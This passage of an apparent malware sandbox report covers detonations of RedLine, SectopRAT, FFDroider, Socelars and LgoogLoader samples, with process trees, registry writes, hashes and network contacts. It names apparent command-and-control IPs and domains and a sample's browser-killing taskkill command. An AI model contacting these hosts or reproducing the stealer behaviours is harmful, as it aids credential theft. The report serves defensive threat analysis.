5e93696986e | C:\Users\Admin\AppData\Local\Temp\Litever01.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\Litever01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\Litever01.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2264 wrote to memory of 2620 | N/A | C:\Users\Admin\AppData\Local\Temp\Litever01.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2264 wrote to memory of 2620 | N/A | C:\Users\Admin\AppData\Local\Temp\Litever01.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2264 wrote to memory of 2620 | N/A | C:\Users\Admin\AppData\Local\Temp\Litever01.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2264 wrote to memory of 2620 | N/A | C:\Users\Admin\AppData\Local\Temp\Litever01.exe | C:\Windows\SysWOW64\WerFault.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Litever01.exe
"C:\Users\Admin\AppData\Local\Temp\Litever01.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 872
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | eduarroma.tumblr.com | udp |
| US | 74.114.154.18:443 | eduarroma.tumblr.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
Files
memory/2264-1-0x0000000001E80000-0x0000000001F80000-memory.dmp
memory/2264-2-0x00000000002E0000-0x000000000037D000-memory.dmp
memory/2264-3-0x0000000000400000-0x00000000004A1000-memory.dmp
memory/2264-4-0x0000000001E80000-0x0000000001F80000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabBEBF.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarBEE1.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/2264-58-0x00000000002E0000-0x000000000037D000-memory.dmp
memory/2264-60-0x0000000000400000-0x00000000004A1000-memory.dmp
memory/2264-59-0x0000000000400000-0x0000000001DCA000-memory.dmp
memory/2264-62-0x0000000001E80000-0x0000000001F80000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win10v2004-20241007-en
Max time kernel
132s
Max time network
156s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2936 set thread context of 2352 | N/A | C:\Users\Admin\AppData\Local\Temp\NAN.exe | C:\Users\Admin\AppData\Local\Temp\NAN.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\NAN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\NAN.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\NAN.exe
"C:\Users\Admin\AppData\Local\Temp\NAN.exe"
C:\Users\Admin\AppData\Local\Temp\NAN.exe
C:\Users\Admin\AppData\Local\Temp\NAN.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| RU | 87.251.71.14:89 | tcp | |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| RU | 87.251.71.14:89 | tcp | |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| RU | 87.251.71.14:89 | tcp | |
| US | 8.8.8.8:53 | 103.209.201.84.in-addr.arpa | udp |
| RU | 87.251.71.14:89 | tcp | |
| RU | 87.251.71.14:89 | tcp | |
| US | 8.8.8.8:53 | 106.209.201.84.in-addr.arpa | udp |
| RU | 87.251.71.14:89 | tcp | |
| RU | 87.251.71.14:89 | tcp |
Files
memory/2936-0-0x0000000074C5E000-0x0000000074C5F000-memory.dmp
memory/2936-1-0x00000000008F0000-0x000000000098E000-memory.dmp
memory/2936-2-0x00000000052E0000-0x0000000005356000-memory.dmp
memory/2936-3-0x00000000052A0000-0x00000000052BE000-memory.dmp
memory/2936-4-0x0000000074C50000-0x0000000075400000-memory.dmp
memory/2936-5-0x00000000059E0000-0x0000000005F84000-memory.dmp
memory/2352-6-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NAN.exe.log
| MD5 | e5352797047ad2c91b83e933b24fbc4f |
| SHA1 | 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772 |
| SHA256 | b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c |
| SHA512 | dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827 |
memory/2352-10-0x0000000005CD0000-0x00000000062E8000-memory.dmp
memory/2936-12-0x0000000074C50000-0x0000000075400000-memory.dmp
memory/2352-11-0x0000000005850000-0x0000000005862000-memory.dmp
memory/2352-9-0x0000000074C50000-0x0000000075400000-memory.dmp
memory/2352-13-0x0000000005980000-0x0000000005A8A000-memory.dmp
memory/2352-14-0x0000000074C50000-0x0000000075400000-memory.dmp
memory/2352-15-0x00000000058B0000-0x00000000058EC000-memory.dmp
memory/2352-16-0x00000000058F0000-0x000000000593C000-memory.dmp
memory/2352-17-0x0000000074C50000-0x0000000075400000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
148s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\anyname.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\anyname.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | 67.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | 75.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | a.goatgame.co | udp |
| US | 8.8.8.8:53 | udp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win7-20240903-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
FFDroider
FFDroider payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Ffdroider family
Reads user/profile data of web browsers
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe
"C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 186.2.171.3:80 | 186.2.171.3 | tcp |
| RU | 186.2.171.3:443 | 186.2.171.3 | tcp |
Files
memory/2088-0-0x0000000000400000-0x000000000062C000-memory.dmp
memory/2088-1-0x0000000000020000-0x0000000000023000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabCE1A.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/2088-19-0x0000000000400000-0x000000000062C000-memory.dmp
memory/2088-22-0x0000000000400000-0x000000000062C000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win7-20240903-en
Max time kernel
119s
Max time network
125s
Command Line
Signatures
Socelars
Socelars family
Reads user/profile data of web browsers
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up geolocation information via web service
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\askinstall50.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 340 wrote to memory of 1096 | N/A | C:\Users\Admin\AppData\Local\Temp\askinstall50.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 340 wrote to memory of 1096 | N/A | C:\Users\Admin\AppData\Local\Temp\askinstall50.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 340 wrote to memory of 1096 | N/A | C:\Users\Admin\AppData\Local\Temp\askinstall50.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 340 wrote to memory of 1096 | N/A | C:\Users\Admin\AppData\Local\Temp\askinstall50.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1096 wrote to memory of 2820 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\taskkill.exe |
| PID 1096 wrote to memory of 2820 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\taskkill.exe |
| PID 1096 wrote to memory of 2820 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\taskkill.exe |
| PID 1096 wrote to memory of 2820 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\taskkill.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\askinstall50.exe
"C:\Users\Admin\AppData\Local\Temp\askinstall50.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
Files
Analysis: behavioral29
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win7-20240903-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\redcloud.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\redcloud.exe
"C:\Users\Admin\AppData\Local\Temp\redcloud.exe"
Network
| Country | Destination | Domain | Proto |
| NL | 95.211.185.27:42097 | tcp | |
| NL | 95.211.185.27:42097 | tcp | |
| NL | 95.211.185.27:42097 | tcp | |
| NL | 95.211.185.27:42097 | tcp | |
| NL | 95.211.185.27:42097 | tcp | |
| NL | 95.211.185.27:42097 | tcp | |
| NL | 95.211.185.27:42097 | tcp | |
| NL | 95.211.185.27:42097 | tcp |
Files
memory/2828-0-0x00000000740DE000-0x00000000740DF000-memory.dmp
memory/2828-1-0x0000000000280000-0x00000000002B0000-memory.dmp
memory/2828-2-0x00000000740D0000-0x00000000747BE000-memory.dmp
memory/2828-3-0x00000000740DE000-0x00000000740DF000-memory.dmp
memory/2828-4-0x00000000740D0000-0x00000000747BE000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win10v2004-20241007-en
Max time kernel
141s
Max time network
147s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-EAN8J.tmp\farlab_setup.tmp | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-EAN8J.tmp\farlab_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-JJGA0.tmp\farlab_setup.tmp | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-EAN8J.tmp\farlab_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-JJGA0.tmp\farlab_setup.tmp | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-EAN8J.tmp\farlab_setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-JJGA0.tmp\farlab_setup.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe
"C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe"
C:\Users\Admin\AppData\Local\Temp\is-EAN8J.tmp\farlab_setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EAN8J.tmp\farlab_setup.tmp" /SL5="$A0032,1570064,56832,C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe"
C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe
"C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-JJGA0.tmp\farlab_setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JJGA0.tmp\farlab_setup.tmp" /SL5="$70034,1570064,56832,C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe" /SILENT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fobe1.com | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files
memory/2472-2-0x0000000000401000-0x000000000040B000-memory.dmp
memory/2472-0-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-EAN8J.tmp\farlab_setup.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
memory/396-7-0x0000000000400000-0x00000000004BD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-A3JFI.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/756-20-0x0000000000400000-0x0000000000414000-memory.dmp
memory/756-22-0x0000000000400000-0x0000000000414000-memory.dmp
memory/396-25-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2472-28-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-VA8CV.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/1536-34-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/756-40-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1536-42-0x0000000000400000-0x00000000004BD000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
Detects LgoogLoader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
LgoogLoader
Lgoogloader family
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\inst002.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XqhdfdAdILYftNJvjC\aplYTN | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4812 set thread context of 1336 | N/A | C:\Users\Admin\AppData\Local\Temp\inst002.exe | C:\Users\Admin\AppData\Local\Temp\XqhdfdAdILYftNJvjC\aplYTN |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\XqhdfdAdILYftNJvjC\aplYTN |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\inst002.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\XqhdfdAdILYftNJvjC\aplYTN | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\inst002.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\inst002.exe
"C:\Users\Admin\AppData\Local\Temp\inst002.exe"
C:\Users\Admin\AppData\Local\Temp\XqhdfdAdILYftNJvjC\aplYTN
C:\Users\Admin\AppData\Local\Temp\XqhdfdAdILYftNJvjC\aplYTN
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1336 -ip 1336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 472
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
Files
memory/4812-1-0x0000000000920000-0x0000000000932000-memory.dmp
memory/4812-0-0x00000000007E0000-0x00000000007F0000-memory.dmp
memory/1336-4-0x0000000000010000-0x000000000005E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\XqhdfdAdILYftNJvjC\aplYTN
| MD5 | 9dabbd84d79a0330f7635748177a2d93 |
| SHA1 | 73a4e520d772e4260651cb20b61ba4cb9a29635a |
| SHA256 | a6e4be06d34448f4efa8655a3ae6e294c98ae4cb42f7c3da3be06b419fa8389d |
| SHA512 | 020114ba08ccb7ad7934e2046d2b61ebd1b006b8c31194f2cfb49ff4397f4db35dc67c8191552346d04709dee4871a13797cf284ef543e7280bc390a6746a314 |
memory/4812-9-0x0000000000920000-0x0000000000932000-memory.dmp
memory/4812-6-0x0000000000390000-0x00000000003DE000-memory.dmp
memory/1336-10-0x0000000000010000-0x000000000005E000-memory.dmp
memory/1336-12-0x0000000000010000-0x000000000005E000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win7-20240903-en
Max time kernel
148s
Max time network
149s
Command Line
Signatures
RedLine
